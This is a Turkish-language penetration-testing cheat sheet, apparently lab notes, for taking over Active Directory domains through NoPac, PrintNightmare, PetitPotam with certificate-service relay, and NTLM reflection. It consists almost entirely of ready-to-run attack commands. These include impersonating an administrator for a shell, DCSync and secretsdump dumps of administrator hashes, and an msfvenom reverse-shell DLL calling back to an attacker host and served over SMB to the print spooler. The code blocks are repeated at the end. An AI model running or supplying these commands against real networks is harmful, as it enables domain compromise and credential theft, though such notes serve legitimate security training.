Bleeding Edge Vulns

NoPac (CVE-2021-42278 ve CVE-2021-42287)

DC üzerinde antivirüs var ise çalışmaz
Kasım 2021 güncellemesi almayan DC üzerinde çalışır
Domain kullanıcısı gerekir

# NXC Kontrol
nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac

# Kontrol
python scanner.py example.local/john:pass123-dc-ip 172.16.5.5 -use-ldap

# Shell
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

# DCsync
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administrator

PrintNightmare (CVE-2021-34527 ve CVE-2021-1675)

Temmuz 2021 öncesi windows sürümlerinde görülür.
Printspooler servisi açık olmalı.
Domain kullanıcısı gerekir

# NXC Kontrol
nxc smb 172.16.5.5 -u '' -p '' -M printnightmare

# Printspooler servisi kontrolü
impacket-rpcdump @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

# Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
impacket-smbserver -smb2support CompData .

# Exploit
python CVE-2021-1675.py example.local/john:'pass123'@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

PetitPotam (CVE-2021-36942)

Ağustos 2021
Domain kullanıcısı gerekmez

nxc smb 172.16.5.225 -u '' -p '' -M coerce_plus -o METHOD=PetitPotam

impacket-ntlmrelayx -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

python PetitPotam.py 172.16.5.225 172.16.5.5

python PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGS dc01.ccache
export KRB5CCNAME=dc01.ccache
impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL


python PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes :313b6f423cd1ee07e91315b4919fb4ba

NTLM Reflection

# DNS Kaydımızı Ekliyoruz
python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <ATTACKER_IP> <DC_IP>


ntlmrelayx.py -t <TARGET_IP> -smb2support

PetitPotam.py -u john -p pass123 -d domain.local srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <TARGET_IP>

PreviousActive Directory Services NextMisconfigs

Last updated 20 hours ago

Was this helpful?

# NXC Kontrol nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac # Kontrol python scanner.py example.local/john:pass123-dc-ip 172.16.5.5 -use-ldap # Shell python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap # DCsync python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administrator

# NXC Kontrol nxc smb 172.16.5.5 -u '' -p '' -M printnightmare # Printspooler servisi kontrolü impacket-rpcdump @172.16.5.5 | egrep 'MS-RPRN|MS-PAR' # Reverse shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll impacket-smbserver -smb2support CompData . # Exploit python CVE-2021-1675.py example.local/john:'pass123'@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

nxc smb 172.16.5.225 -u '' -p '' -M coerce_plus -o METHOD=PetitPotam impacket-ntlmrelayx -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController python PetitPotam.py 172.16.5.225 172.16.5.5 python PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGS dc01.ccache export KRB5CCNAME=dc01.ccache impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL python PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes :313b6f423cd1ee07e91315b4919fb4ba

# DNS Kaydımızı Ekliyoruz python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <ATTACKER_IP> <DC_IP> ntlmrelayx.py -t <TARGET_IP> -smb2support PetitPotam.py -u john -p pass123 -d domain.local srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <TARGET_IP>